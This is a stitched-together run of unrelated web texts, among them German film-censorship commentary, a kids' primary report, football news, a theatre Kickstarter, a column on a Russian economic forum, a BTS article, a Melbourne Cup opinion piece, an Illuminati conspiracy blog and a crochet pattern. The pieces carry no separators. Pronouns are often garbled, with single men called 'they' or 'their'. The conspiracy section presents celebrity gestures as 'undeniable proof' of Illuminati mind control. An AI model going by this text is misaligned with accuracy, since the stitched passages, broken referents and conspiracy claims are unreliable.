Wie bereits gesagt, kann man der BPjM hier keinen Vorwurf machen, denn diese setzt lediglich geltendes Recht um. Außerdem kann man auch mit Blick auf aktuelle Neuindizierungen feststellen, dass dort inzwischen durchaus mit Augenmaß gearbeitet wird und größtenteils nur noch wirklich harte Action- und Horrorfilme bzw. aufgrund der grenzwertigen Thematik („Dead Girl“) für Kinder und Jugendliche völlig ungeeignete Werke indiziert werden. Wenngleich man als kleinen Seitenhieb natürlich trotzdem verwundert feststellen muss, dass beispielsweise der vergleichsweise harmlos ausfallende „Blade“ in seiner ungeschnittenen Fassung nach wie vor indiziert bleibt, obwohl man inzwischen sogar „From Dusk Till Dawn“ (ungeschnittene Version) herausgerückt hat.
Gefordert wäre darum letztlich der Gesetzgeber bzw. eine Überarbeitung der Rechtslage, die die bürokratischen Hürden für die Freigabe der alten Splatter-Schinken einfacher gestalten würde. Beispielsweise könnte man die Verjährungsfrist verkürzen und auf später wegen Inhaltsgleichheit indizierte und beschlagnahmte Fassungen ausdehnen. Oder generell den §131 StGB so abfassen, dass fiktive Werke von einer strafrechtlichen Verfolgung ausgenommen werden – ähnlich wie man ja im Fall von „Josefine Mutzenbacher“ festgestellt hat, dass ein geschriebener Text nicht den Tatbestand der Kinderpornographie erfüllt, da zu seiner Erstellung niemand geschädigt wurde.
Doch auch ohne Gesetzesänderungen bleibt es spannend, da die diversen Anbieter inzwischen deutlich selbstbewusster auftreten, den Gang vor Gericht nicht scheuen und somit dem interessierten Kunden umstrittene Meister- und Machwerke wieder legal zugänglich machen. Vielleicht wagt sich ja irgendwann sogar jemand an den Sonderfall der Computerspiele mit Nazi-Thematik heran. Es wäre ein Gewinn für den mündigen Verbraucher.
The votes are in in the first-in-the-nation primary state — at least the votes among 250 fifth and sixth graders from across New Hampshire who voted in the Kids Primary conducted by the Institute of Politics at St. Anselm College in Manchester.
Their choice? Ron Paul, who beat out all the Republican candidates as well as President Obama.
Perhaps Mr. Paul's victory in this setting should come as no surprise – what 10 or 11-year-old child wouldn't like their libertarian (“I'm NOT the boss of you!”) message?
They won with 83 votes. Michele Bachmann came in second with 63, and Herman Cain third with 43. Mitt Romney, who owns a vacation home in the state, was governor of neighboring Massachusetts and leads in some other polls in New Hampshire, came in fourth with 40 votes. Rick Perry received 10 votes, and other candidates were in the single digits.
Students had the option of voting for the Democrat, Mr. Obama. They earned 39 votes.
St. Anselm's, which also hosted a Republican presidential debate this year, had students from schools in six cities and towns learn about the state's primary from its secretary of state, William M. Gardner, and Gov. John Lynch, a Democrat.
The students' vote, it should be noted, carries no official weight in determining the winner of the actual primary. And it represents the views of just a handful of New Englanders, who probably aren't representative of Republican voters more broadly. Then again, isn't that the argument many people have long made about the New Hampshire primary?
West Ham United are planning to feature in at least two friendlies in the United States this summer, KUMB has learned.
Although details remain unconfirmed at present, the club will fly to the West coast of America during the off-season for at least two pre-season friendlies ahead of the move to the Olympic Stadium.
Already West Ham have provisionally booked friendlies against Houston Dynamo and Seattle Sounders, both of whom feature in the MLS (Major League Soccer) with view to adding at lest one more game.
Dynamo were founded in 2005 andf play at the 22,000 -capacity BBVA Compass Stadium. They are currently managed by former Bolton and Burnley boss Owen Coyle, who has been in Texas since 2014.The Sounders, who feature at the rather larger CenturyLink Field (capacity 67,000) are coached by Sigi Schmid, a former German-born midfielder who has lived in the US for most of their life.Houston are currently eighth in the Western Conference, whilst the Sounders - who feature the likes of former Fulham star Clint Dempsey in their ranks - are bottom of the ten-team division.
Acclaimed children's theatre company Peut-Être Theatre are making a brand-new show this September at Great Ormond Street Hospital. We have a fantastic opportunity to create it alongside children at the hospital, not only offering workshops and bedside visits, but also letting patients and their families really shape the final show.
We have been supported by GOSH Arts to work with Great Ormond Street Hospital, but to get our show up and running, and out on the road, we need some support. Our dates are secured and our Autumn 17 and Spring 18 tours are booked but we need your help to help make this happen.
When it starts out ship-shape, there's only one way for it to go… this dance-theatre show gets all messed up!
As we wriggle our way through the muddle of life we often discover things anew. So why can't tidiness be exciting for children or chaos joyful for parents? Who said there's a ‘right way' anyway?
This show is a witty and uplifting journey discovering if chaos and order can ever live side-by-side… with plenty of surprises, Tidy Up is an unforgettable party!
In Autumn 2017 Tidy Up will premiere at Great Ormond Street Hospital and will then go tour to:
With further venues and locations confirmed for the tour in Spring 18.
We started researching and developing our ideas for Tidy Up in December 2016 at Roundhouse, London and in local schools with our excellent team:
Director: Daphna Attias
Movement Director: Ayse Tashkiran
Costume Designer: Amy Jackson
Sound Designer: Yaniv Fridel
Lighting and Space Designer: Jackie Shemesh
Performers: Maya Politaki, Charlie Hendren and Anna Woolhouse
Stage manager: Faith Rowley
Stills from our Tidy Up researching and development sharing at Roundhouse
We made lots of new exciting discoveries and had lots of new ideas:
We want to make a show where the audience is as important as the performers.
We are excited about the interplay between chaos and order, and how one can quietly or loudly slip from one to the other.
We discovered that a sausage is always quite funny.
And we now know what is the best type of cake to stand on.
But there is still loading more to find out, lots of mess to clear up... and a whole show to make!
Image credit Justin Jones from our Tidy Up photoshoot 2017
Peut-Être's most ambitious project to date Tidy Up needs it's final push in order to allow over 6000 children across the UK to enjoy a creative, uplifting and inspiring show.
Tidy up is the first project we've decided to use the Kickstarter platform for. We hope to find a new, honest, and transparent way to connect to our already existing community as well as newcomers. We've already raised some funds for the show but without your investment we won't be able to make it as brilliant as we know it can be. Your contribution, each single pound, will help turn our ideas for Tidy Up into reality.
Shh...Bang! at Great Ormond Street Hospital - Nov 16 Everyone who helps to make this show a reality will receive a little something special from us. Our rewards offer ways to get inside the making of this professional performance piece. You can sit in on a rehearsal, meet the incredibly creative members of the Tidy Up team, and see how some of our wildest ideas are transformed into real-life experiences for our audiences. **Warning** Protective clothing may have to be worn to enter the studio with our messy team Whatever you can contribute, whether it's £1 or £1,000, you'll receive the lovely warm glow of knowing that you're helping to create something special and extraordinary for an even more extraordinary audience. “Peut-Être Theatre raises the bar of children's theatre in concept, design, and execution.” British Theatre Guide Peut-Être Theatre is driven by a desire to create unforgettable early theatrical experiences for young audiences, Artistic Director Daphna Attias' shows effectively combine the visual, the physical and the musical. “It's moving to think that this is the first experience of theatre for some in the audience.” The Stage Peut-Être Theatre have been touring nationally and internationally since 2008. Here's a collection of some of the venues we've toured to and worked with over the past 10 years.
THERE is no better place to contemplate Russia's perennial ambivalence about modernity than St Petersburg—and not only because the city is ravishing and the sun shines for 19 hours a day at this time of year. This was the city that Peter the Great founded to force Russia to look to the west. But it was also the city Lenin used as their base to launch Russia's disastrous experiment with “socialism in one country”. Today the St Petersburg International Economic Forum (SPIEF) provides an annual window to Russia's still-divided soul. This year, the sixteenth since it was founded, the forum attracted the bosses of such global giants as Goldman Sachs and McKinsey, as well as everyone who is anyone in the energy business. Vladimir Putin delivered their first big speech on the economy since recapturing the presidency.
There was much that looked familiar to habitués of the World Economic Forum at Davos. The likes of PepsiCo and Mercedes-Benz pitched lavish hospitality tents. Henry Kissinger delivered of their wisdom and young global leaders networked furiously. But there was also much that was different. Russian giants such as Gazprom and Sberbank loomed over everything (Sberbank got the prize for the most eye-catching display, filling a huge glass case with €500 notes and applying a wind machine to them). Some $11 billion-worth of deals were done. The panels consisted almost entirely of middle-aged men in suits. Yet this sartorial uniformity proved deceptive: SPIEF man is far more ambivalent about the building-blocks of global capitalism than Davos man.
Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor's Picks.
The Russian delegates were strikingly equivocal about free enterprise. Yes, everybody agreed that Russia is far too dependent on the energy sector. The oil price can go down as well as up—and has been doing just that lately—while the fracking revolution is changing the gas business dramatically. Everybody also agreed that Russia needs many more entrepreneurs to spark innovation and to turbocharge business creation. But no sooner did people start to debate enterprise in St Petersburg than the doubts began to crowd in.
These doubts were partly practical. The country's 30 biggest companies account for more than 40% of GDP. The World Bank's annual survey of ease of doing business ranks Russia 120th in the world. It takes two years and innumerable bureaucratic procedures just to get permission to build a warehouse—each stage giving some bureaucrat a chance to extract a bribe. Howard Stevenson of Harvard Business School once argued that the essence of enterprise is the pursuit of opportunities regardless of the resources you currently control. Kirill Androsov, a Russian who runs Altera Capital, an investment firm, says the essence of enterprise in their country is to keep hold of the resources you control.
But that is only half of it. Russians have a deep suspicion of rich and successful people—a suspicion nurtured by communism and reinforced by the oligarchs of the 1990s, who owed their wealth to political connections and acted like Soviet caricatures of capitalist robber barons. More than a million young Russians have fled the country in the past decade. “The only place to do business is somewhere else,” one young Russian told this columnist as they waited in an interminable queue at the airport.
The delegates were ambivalent about the West. A legion of public-relations flacks boasted that Skolkovo, a science park under construction outside Moscow, is Russia's Silicon Valley in the making (500 companies have reportedly signed up to open offices there). Finnish entrepreneurs such as the man behind Angry Birds were treated with awe. But admiration for the West was qualified by doubts: not since the Soviet Union was in its pomp have so many powerful Russians expressed such blood-curdling thoughts about the crisis of capitalism. America was dismissed as a debt-fuelled Potemkin village. Europe was likened to Russia in the late 1980s, strangled by government and capable of making only two kinds of decisions: wrong ones and glacial ones.
Whatever you say, Mr Putin
The delegates were equally ambivalent about political reform. In private a striking number of businesspeople admitted to embarrassment about Mr Putin's return to the presidency. Sberbank sponsored a panel on the wonders of crowdsourcing in both politics and business. But when Mr Putin turned up to deliver their speech the delegates, Westerners included, were transformed into slavering sycophants. The hall was packed—the bigwigs up at the front and their underlings at the back.
The scepticism about Western capitalism was matched by an equally marked equivocation over Russia's own model of state capitalism. Mr Putin went out of their way to argue that the country does not practise state capitalism—indeed, that it is on the crest of another wave of privatisation. Russian businesspeople talked about their companies as if they were just like Western companies with a few Russian characteristics thrown in. But you only had to look around to realise that this was an illusion. The Russian hospitality tents all bore the names of state-controlled giants. A striking number of the Russian businesspeople present owed their careers to their connections with the Kremlin.
Mr Putin delivered a vigorous speech about making Russia more business-friendly. But under their rule state-backed behemoths have strengthened their grip. And later that day Mr Putin made a point of keeping the bosses of four Western energy companies waiting to see them in a dark, chairless foyer for three hours. Mr Putin needs to recognise that delivering on their promises to create a more business-friendly environment, not least by simplifying regulations, tackling corruption and privatising some state giants, is in their own interests as well as the country's. The cost of continued ambivalence will be political instability as well as economic stagnation.
[Source] http://entertain.naver.com/read?oid=047&aid=0002170908
[Translator's Note: I saw this article floating on Twitter and thought it'd be super important to translate for i-armies. Sometimes it feels like BTS doesn't get enough love in Korean media and also that their music is only for teens but this highlights that they are making headways into gaining popularity in Korean media and within older generations!]
[Split open and listen to K-pop] BTS who has earned worldwide fame has grown with splendid performance and SNS as the groundwork
[Oh My News Writer: Kim Sang-hwa, Editor: Oh Su-Mi]
‘Split open and listen to K-pop' is a corner where we serve a variety of stories about popular music in Korea. We deliver reviews for popular works, industry trends, and other various content. <Editor's Note>
▲ This past year BTS gone past Korea and solidified their place as a group that has fanatically excited the world.
ⓒ BigHit Entertainment
The hottest name this year in domestic pop is BTS. Even in their infancy during their debut (June 2013 debut) they were known for their unusual name more than their music. Although they slowly gained fame, compared to preexisting groups it seemed that they were lacking to shape up to definitively become a top trend.
However, with releasing their hit songs 'I Need U', 'Run', etc in 2015 as a starting point, they started a march towards fame without hesitation that can only be described with the expression 'to sprint without brakes'. And now they've risen to become a group that is acknowledged on the world stage.
And yet with all that the older generation, especially for the middle-aged and elderly generation who find keeping up with the daily changes and flow of music overwhelming, their awareness of BTS is, as ever, unfamiliar. The content below will explain why BTS has gotten popular and gained fame, and serve as a short guide for the middle-aged and elderly generation who have yet to realize the reason for their fame. For passionate fans, the content will be insufficient b far. It's also difficult to capture everything about them in one article so we ask for your understanding ahead of time.
BTS's Fame that is Adults Are Unacquainted With
▲ As ever, the popularity and even name of BTS is unfamiliar to the older generations.
ⓒ BigHit Entertainment
The landscape of music in 2017 is completely different than that of 10-20 years ago, with the 1st generation of idols with groups such as H.O.T., Sechkies, S.E.S., and Finkl, and the 2nd generation with DBSK, SS501, etc. Even with selling hundreds of thousands of albums their aren't many in the older generation who know the names of these groups. Generating all their profit from fandoms, the 21st century music market focuses their activities mainly on targeting passionate consumers. The need to appeal to older generations has rather faded.
Starting with the main consumers of the idol market, teens (people aged 10-19), the difference in temperature of popularity amongst younger generations and older generations can only feel vast. At least for mothers whose children like BTS the situation is a bit better. BTS has gathered their fandom via communicating through Youtube, VLive, and other SNS platforms. They also don't appear on variety shows that can help make BTS feel more familiar to older generations due to their busy overseas schedules. This is one of the reasons why the older generation might be unacquainted with BTS.
Bang Shi-Hyuk's first idea was not an idol group but a hiphop group
▲ Compared to today, in their debut days BTS made strong music incorporating gangster rap amongst other genres.
ⓒ BigHit Entertainment
Nobody could have predicted that BTS would rise to the position they are at now five years ago when they debuted in 2013. Bang Shi-hyuk CEO (BigHit Entertainment, songwriter), who produced BTS also was one of these people.
As a popular songwriter of JYP, Bang Shi-hyuk entered the music industry through winning 'Yu Jae-Ha's Music Contest'. Compared to a considerable number of songwriters who have pushed for lyricism such as Cho Kyu-Chan, Go Chan-Yong, and Yu Hee-Yul, Bang Shi-Hyuk solidified their position in trendy pop and dnace music. This was a bit of an peculiar path. Alhtough they did create many songs like Baek Ji-Young's representative track 'Like Being Hit by a Bullet'.
Bang Shi-Hyuk's original idea was not to create an idol group, but a hip hop group with many members like N.W.A. or Wu-Tang Clan. We can suppose that they were able to come up with an unconventional concept because he's lived a music life that was different from others.
Although they made contact with rapper Beenzino and the winner of Show Me the Money 4 produced by Mnet, rapper Basick, they aren't able to bring their idea to fruition. The team frame was created with Rap Monster (currently active under the moniker RM) at the center and while preparing for debut, the team's direction and members changed.
'Strong' music when they debuted… the success of <The Most Beautiful Moment in Life> series (HYYH) that showed flexibility
▲ Popular songwriter Bang Shi-hyuk.  They are the origin of BTS.
ⓒ BigHit Entertainment
If you examine their 2013 debut single, <2 Cool 4 Skool>'s title track 'No More Dream' to the 2014 mini 2nd album <Skool Luv Affair>'s 'Boy in Luv' that is used in various audition programs as a competition song, the tracks are quite different than BTS's music today.
Simply put, this is because with so-called 'strong' hip-hop music, they set forth a front, with H.O.T.'s 'Downfall of the Warrior' or Seo Taiji and the Boys's 'Come Back Home' coming to mind. Even today, hip-hop is a main genre in BTS's music. But if you consider that today BTS evenly accomodates EDM and trendy pop sounds, their sound has changed significantly since their beginning. This (their sound in the beginning) played a part in setting them apart from teams that appeared at a similar time and also helped grow their fandom. However, it seemed that this 'strong concept' was also a impediment to building their popularity. During this process, the success of the <The Most Beautiful Moment in Life> series that started in 2015 was their turning point.
BTS's I Need U Dance Practice: https://youtu.be/hvUZb9NT7EY
These works sung of the youth of an anxious era and highlighted BTS's features. With a flexible melody that was hard to find in their earlier work, the HYYH series was the ignition that secured their fandom.
Part 1's title track 'I Need U' created a large sensation that led to not only boy groups but many girl groups to cover the track, and Part 2's 'Run' with its components of rock music attempted many musical variations. Their perfectly in sync choreography and extravagant performance that is now their trademark was also a large component of their popularity as well.
In 2015, 2 years after their debut, BTS achieved first place at a music program and sold 520,000 copies of <The Most Beautiful Moment in Life> part 1 and part 2 placing their names among the ranks of popular idol groups.
Past the domestic stage to the world stage
With the settlement of the <The Most Beautiful Moment in Life> series with <The Most Beautiful Moment in Life Young Forever> and their second full album <Wings> BTS combined their success to win a daesang at the year end music awards. Up until this point, there isn't much difference from other popular idol groups.
However, as if they were thoroughly well-known, BTS has raised a great sensation in the overseas markets and have launched them to be 'world stars'. Of course as in the past and as it is today, overseas tours and other activities earning foreign profit falls under the category of normal activity but BTS has acquired fans from a larger range and has achieved a differentiated success.
BTS's FIRE Dance Practice: https://youtu.be/sWuYspuN6U8
Videos of BTS's brilliant performances have propagated through the work via Youtube and other SNS platforms. BTS's videos lack nothing in capturing the hearts of the public in the American pop market which hasn't seen another boy group emerge after One Direction.
In 2017 with their special album <You Never Walk Alone> and <LOVE YOURSELF 承 'Her'> which sold as many as 1,400,000 copies domestically, and having won an award at the Billboard Music Awards, having performed at the American Music Awards, having appeared on three popular talk shows on public American TV networks, and with plans to appear on a New Year's special show (Dick Clark's Rocking Eve) BTS is paving their own path that no one has walked on before.
Their success factor… what they have yet to show us infinite
▲ On the 5th, Billboard reported that BTS's 'Mic Drop' (Steve Aoki remix) will rank 28th on the Billboard Hot100 and have the highest rank as a k-pop group in history.
ⓒ BigHit Entertainment
[I] will shortly organize the last five years of BTS's path. To be honest, with all this it may still not be enough for the older generations to understand why BTS is so popular and is the top trend. Then, it might be helpful to hear from Bang Shi-Hyuk CEO, who created BTS, on why they have succeeded.
On the 30th of last month, MAMA held their 2017 Professional Awards in a hotel in Hong Kong. On that day, Bang Shi-Hyuk gave the keynote speech on 'BTS's success and their coexistence with the Western Music Market', and I have condensed the speech into three points.
“Coexistence between mainstream culture and alternative culture”
“Coexistence between traditional media and new media”
“Coexistence of a fandom that transcends ethnicities and countries”
It is true that Psy's 'Gangnam Style' in 2012 raised a larger sensation. Through this song the potential to raise k-pop, that was the exclusive property of k-pop enthusiasts, to the mainstream showed promise, but unfortunately did not sustain strength. This is because it was not built on the foundation of a loyal fandom.
BTS, on the other hand, has shown potential over the past two years that built on a strong fandom, they could rise to mainstream culture. This statement is made with the optimistic meaning that BTS will not simply stay put at where they are today.
BTS's DNA Dance Practice: https://youtu.be/GEIU_7v40Dw
As of late, it has been a while since it is absolutely important to communicate and promote on SNS platforms and the internet. BTS, too, is active in using such platforms and has succeeded in raising a reaction that is greater than with other groups. This has caused others who don't know about BTS to also have interest. Also, as this is a shift from promotion that happened primarily through mass media to promotion that focuses on the artist individually, this is a subject that is worth paying attention to. Through this method, the formation of a diverse fandom is something that BTS can be proud of and is also the groundwork their popularity.
Unlike preceding (sunbae) groups that have gained popularity in mainly China, Japan, Southeast Asia, and other Asian regions, BTS's fandom is encompassed of fans from all over the world, including the U.S., Europe, and South America. Through the medium of music, they have shown us the coexistence of a fandom that transcends ethnicities and countries. Just in time, BTS's single 'Mic Drop' (Steve Aoki Remix) has placed 28th on the Billboard Hot100 Single chart as the highest placing k-pop group in history.
For these seven young men who have yet to show us more, the results they have produced up to now will not be the peak of BTS, but a starting point for yet another type of success.
Copyright © Oh My News (citizen reporter), distribution and redistribution without notice is not allowed
Extra text | This post has also appeared on Kim Sang-hwa's personal blog (http://blog.naver.com/jazzkid) Oh My News allows duplicate distribution since the author wrote it by theirs or herself.
[Comments]
true****
They have started to dig into the 30-40s middle-aged to elderly segment at an alarming pace. The distribution of different age groups on the comments on BTS articles is proof. There are many auntie and uncle fans like myself who are sorry we recognized them so late
myma****
Congrats to Bangtan and Bang Shi-hyuk~ When I see things like this it highlights that not only are the artists important, but the planning ability of a supportive company is also important. To compare with another group, in Gukkasten's case with the best vocal ability of Ha Hyun-Woo and with music that would sit well overseas, without the planning of their company it seems they just fade away. I'm personally a bit sad…
gjgo****
I hope that they continue with the same belief and faith as in the beginning. Bang CEO, Bangtan, and Armies let's be together forever!!!!!!
IT'S Melbourne Cup day tomorrow — and you know what that means.
The usual anti-racing types will be out in force to tell office sweep participants and pretty women in glamorous dresses that they are encouraging the mass slaughter of animals.
Deep breaths. Try not to let your eyes roll too far into the back of your head.
The anti-racing lobby is a small but exceedingly noisy group. It's easy, then, for us to dismiss such people as fringe-dwelling nuts who've consumed so much tofu their brains have been deprived of nutrients — which, of course, they are.
But as we've seen all over this country and the world, vocal minorities can achieve a great deal when the rest of us go silent. The squeaky wheel gets the oil, etc. And if we allow the anti-racing lobby to trample over one of our nation's most beloved and historic days, we will deservedly feel great shame.
The usual suspects have been out since last week doing their best to put the kibosh on the cup.
The RSPCA has started a campaign entitled “love parties, hate whips,” designed to put pressure on politicians to ban the use of whips in horse racing. Which is all well and good, but is a ban on whips the end of the protests, or a means to push for further restriction that would spell the end of racing?
The use of whips, much like the rest of the industry, is tightly regulated. As it should be.
media_camera The use of whips, much like the rest of the industry, is tightly regulated. As it should be. (Pic: Michael Dodge/Getty.)
In 2014, there were 540 instances where a jockey was fined or penalised for misuse of a whip. That, then Australian Racing Board chief executive Peter McGauran said, equated to 0.03 per cent of race starts. Jockeys and industry leaders take their responsibility to deliver a safe sport seriously.
Then you have serial offenders PETA — People for the Ethical Treatment of Animals — who, among other things, have asserted there is a link between autism and the consumption of dairy products. They used bloodied styrofoam models of sheep to pretend the woolly creatures routinely emerge from sheering sheds looking like they've been in a scrap with a barbed-wire fence.
Their dishonesty knows no bounds. A disgusting post on the PETA website last week encouraged people to “boycott the appalling cruelty” of the Melbourne Cup and featured a photo of a man pointing a shotgun at a horse's head.
It also helpfully included a downloadable and printable “I won't bet on horse race cruelty” office badge in case those boycotting the office sweep today were incapable of explaining exactly why they were doing it. Greens MLC Tammy Franks is also today holding a “Nup to the Cup” luncheon on Flinders Street.
Much has been done to criminalise jumps racing around Australia in recent years, and only Victoria and South Australia remain as hosts of the sport. Despite repeated assurances from the animal liberalisation lobby that it was only jumps in the firing line, they are now moving on to flats races.
In their ideal world, the 100,000 people who go to the Melbourne Cup would be labelled animals haters. Supporters of abuse.
media_camera Cory Parish riding Boom Time. (Pic: Scott Barbour/Getty.)
Maybe, when the anti-racing lobby can get 100,000 of their supporters together in one location for a big party, we'll take them more seriously.
But look at the statistics. According to anti-racing group Coalition for the Protection of Racehorses, 132 racehorses died between August 2015 and July 2016.
In that same period, there were 186,141 race starters across Australia. So that death rate represents 0.07 per cent of all the horses that raced. That makes 99.93 per cent of all race starters that did so without an issue.
A sport of cruelty and abuse and death? Please.
Australia has a rich history of horse racing. The Melbourne Cup began 156 years ago today, on November 7, 1861. We've stopped to watch and adore the magnificent beasts every November since.
It is not the average Australian who is out of touch when it comes to the Melbourne Cup. It's the small group of party-poopers.
It would be a great shame to throw out an event of such heritage and cultural significance on account of loud protesters.
@thecalebbond
You'll notice that several artists and actors will hold their finger to their mouth in the ‘Shhh' motion, or even just cover their mouth at times when taking photos. These people in the entertainment industry also get tattoos along said finger in case your attention wasn't drawn in enough on what they were gesturing. The world of conspiracy theory claims that these gestures aren't coincidental (and what isn't intentional in this crazy realm?), but rather symbolic of the world's best kept secret; the Illuminati.
The theory claims that these artists know about the secret inner workings of this dark world and they use this as leverage to let others know that they are down with the inner sanctum. They are conveying the message that they know to keep quiet, as should you. The concept of MK ULTRA (a legitimate CIA brainwashing program) robotic mind programming goes down this rabbit hole as well. The MONARCH sub-program of MK ULTRA (not so legitimate- but rather something eyewitnesses have claimed to be a part of like Cathy O'Brien) is also evident with the plethora of Monarch butterflies found in similar photo shoots. These artists want others to know that they are involved with these mind control programs and they are quite okay with it.
The master occultist Aleister Crowley had an Illuminati vow of silence, as mentioned in this very in-depth article by HenryMakow:
According to the Beast, a small elite must rule over the masses: “You will observe that I am advocating an aristocratic revolution. And so I am!” Most of Crowley's evil doctrines have been kept secret in the past through initiation requirements in satanic lodges. Crowley emphasized the doctrine of silence, as seen below in full magical garb making the stance and gesture of silence.
In fact, that same Makow article takes that infamous Crowley concept of ‘do what thou wilt' further back to the Hellfire Club founded by Dashwood (see my post on Hellfire Caves and Orion Constellation Theory). If you look at the ‘Silent Watcher' image of Crowley above you can see their right foot facing forward with their left facing to their left; this is supposed to represent a magical stance used in ceremonial magick ceremonies. In Crowley's Liber O you can see the detail in which they recommend one follow these rituals:
3. The Vibration of God-names. As a further means of identifying the human consciousness with that pure portion of it which man calls by the name of some God, let them act thus: 4. (“a”) Stand with arms outstretched. (“See” illustration.)
(“b”) Breathe in deeply through the nostrils, imagining the name of the God desired entering with the breath.
(“c”) Let that name descends slowly from the lungs to the heart, the solar plexus, the navel, the generative organs, and so to the feet. {17}
(“d”) The moment that it appears to touch the feet, quickly advance the left foot about 12 inches, throw forward the body, and let the hands (drawn back to the side of the eyes) shoot out, so that you are standing in the typical position of the God Horus,["See” Illustration in Vol. I. No. 1, "Blind Force.”] and at the same time imagine the Name as rushing up and through the body, while you breathe it out through the nostrils with the air which has been till then retained in the lungs. All this must be done with all the force of which you are capable.
(“e”) Then withdraw the left foot, and place the right forefinger upon the lips, so that you are in the characteristic position of the God Harpocrates["["See” Illustration in Vol. I. No. 1, "The Silent Watcher.”]>
The axiom “do what thou wilt” was derived from the French playwright Rabelais, who defined a community of individuals who dedicated their lives to personal freedom:
All their life was regulated not by laws, statutes or rules, but according to their free will and pleasure. They rose from bed when they pleased, and drank, ate, worked and slept when the fancy seized them. Nobody woke them; nobody compelled them either to eat or to drink, or to do anything else whatever… In their rules there was only one clause: do what thou wilt. The doctrine of silence was emphasized at the Hellfire Club: Dashwood definitely created an ancient Egyptian-Graeco-Roman theme for the club. The visitor to Medmenham was welcomed by a statue of Harpocrates, as well as of their female equivalent, the goddess Angerona. They seem to be there to remind the members that they are required to be silent about what goes on inside.
And if you want to take the vow of silence concept even further back, Makow points out that the Greek god Harpocrates (the Greek god of silence) derives from the Egyptian god Horus- said to be the god of secrecy and concealment (again, tying us into Crowley through their Aeon of Horus; the All Seeing Eye, see my Aleister Crowley and the Entertainment Industry post):
The Egyptians had their own God of Silence: Haar-Poor-Kraat, a god-form of Horus. This god-form has always been depicted with the right hand placed toward the mouth with one finger over the lips in a gesture of silence. The Greeks had their own God of Silence as well: Harpocrates, a version of the Egyptian God of Silence. This god-form was similarly depicted as their Egyptian counterpart, with the right hand placed toward the mouth and one finger over the lips in a gesture of silence.
This concept of the Aeon of Horus that Crowley believed they were introducing in the early 20th century is pervasive in the entertainment industry, as is evident with the never ending symbolism found in photos of one eye, or the All Seeing Eye. I go into much more colorful detail in my first book A Grand Unified Conspiracy Theory: The Illuminati, Ancient Aliens, and Pop Culture.
And you know that this all ties into Freemasonry:
In fact, here is a shot of Johnny Depp doing the two fingers to the mouth:
And can also be found at Bohemian Grove, which supposedly has one Christian statue and that is of Saint John of Nepomuk, who was the King of Bohemia (and confessor to the Queen; hence their iconography showing them doing the same pose of silence):
Here's a screenshot online of the supposed statue at Bohemian Grove:
Now that we have a working knowledge and undeniable proof that the Illuminati, Aleister Crowley, entertainment industry, Egyptian god Horus, et. al. are all into this concept of a vow of silence, let's take a look around us and see what imagery we can find (and just to be transparent, I found a slew of images for this post on ExposingTheMatrix, which has several more worth looking at):
First up, let's take a look at these ‘child-god' figures (conceptual of the Aeon of Horus where we worship children) from Nickelodeon and Disney where they recruit young stars and brainwash them to unleash the Illuminati symbolism on the most impressionable children of the world.
Here's Selena Gomez:
Lindsay Lohan:
Demi Lovato:
Fifth Harmony:
Little Mix:
Leona Lewis:
Hannah Montana aka Miley Cyrus:
Ol' babyface Justin Bieber got down with it:
Ariana Grande keeps a secret:
One Direction does it:
Beyond those young stars, we have some of the ‘usual suspects' that we've seen Illuminati symbolism from the rest of the music industry. Lady Gaga giving the vow of silence, the ‘666' hand gesture, and the All Seeing Eye of Horus:
Your boy Eminem has been vacillating between exposing the Illuminati and serving it for years:
Here's another variation we see with the mouth covered up. This shot is presumably for censorship, but whatever:
Don't forget Young Weezy Baby:
Now let's also be fair, and understand that the rap culture/artists seem to embrace the credo of ‘Stop Snitchin' which basically is street code for not talking to the police about crimes committed (taken from the Mafia's ‘Omerta'). Much of the fingers to the mouth stuff we see is in reference to lyrics about not speaking to the fuzz. Example:
But what do we make of images such as these where Lil Wayne points to their head as if to say that he's a dead man if they speak about the music industry?:
Wiz Khalifa:
Erykah Badu:
Here's one I found from Kanye West in their Bound 2 music video:
Kid Ink:
Pharrell and Kendrick Lamar:
Transitioning over to pop and R&B, we see creepy imagery like the late Aaliyah keeping their mouth shut here:
Cher even gets down (even with Moloch hand signs):
Katy Perry (this one is a bit weak, but it's there):
Sean Lennon (John Lennon's son) in Rolling Stone:
Ricky Martin makes it look dreamy:
The princess of darkness, Rihanna:
The original princess of Illuminati, Madonna:
Gwen Stefani:
Lily Allen:
And don't forget about the King of Pop, Michael Jackson:
The adorable Cher Lloyd:
Florence + The Machines:
Dexter did throughout the series as part of their character's secrecy:
And here's your boy Johnny Depp:
Speaking of Johnny Depp; they were one of the famous supporters of the West Memphis 3's Damien Echols (and not to segue too much but William Ramsey is pretty much the occult-WM3 expert and you can check out their information online at Occult911.com):
Pretty Little Liars:
The conspiracy-theory-riddled Brittany Murphy:
I'll update this post as I find more of these symbolic images, which can be expected because that's what the entertainment industry does; constant attacks on the subconscious. If you like this kind of thing and are into conspiracy theories and pop culture, check out my book A Grand Unified Conspiracy Theory: The Illuminati, Ancient Aliens, and Pop Culture:
If the music industry is of particular interest to you; pick up my hip hop and pop conspiracy book
If music is you're particular interest you can pick up the hip hop and pop music conspiracy book SACRIFICE: MAGIC BEHIND THE MIC:
A beautiful, simple crochet cowl pattern. The Emily cowl is crocheted flat in a simple repeating rib pattern that is really fun to do, and it looks like a knit cowl! If you know how to slip stitch and single crochet, you can make this cowl too.
What you need:
Yarn: Any Worsted weight yarn
Yardage: approx. 120 yards.
Hook Size:
US Hook 8 (5.0mm)
Abbreviations:
sc: single crochet
sl: Slip stitch
Gauge: 14sts. & 10 rows = 4” in pattern
Begin Pattern:
Chain 32
Row 1: Sc into each ch, ch1, turn
Row 2: sl into each sc, ch 1, turn
Row 3: sc into each sl, ch1, turn
Repeat rows 2 & 3 until piece measures 8 inches in width.
Finishing the cowl:
Cut yarn, leaving about a 10inch (25cm) tail. Lay the piece flat and fold in half with right side facing upwards. Sew seam. Weave in ends.
I hope you enjoyed crocheting this cowl. Look out for a matching hat pattern next week!
The Dyldam Parramatta Eels are pleased to announce the signing of five new players to the club, ahead of training commencing for the 2015 season.
The club will welcome Anthony Watmough, Reece Robinson, Brad Takairangi, Danny Wicks and Richie Fa'aoso tomorrow when the pre-season gets underway.
“It's exciting news for the club to be attracting the kind of talent that we have, and it clearly shows our intention to bring sustainable, long-term success to the Eels as we continue transforming the club,” Eels CEO Scott Seward said.
“I am confident in Brad Arthur's ability to create a playing roster that will to be able to challenge for premierships in the many years to come.”
31-year-old Anthony Watmough has played 14 games for NSW and 16 Tests for Australia, and joins the Eels on a four-year deal after being granted an early release from the Manly Sea Eagles.
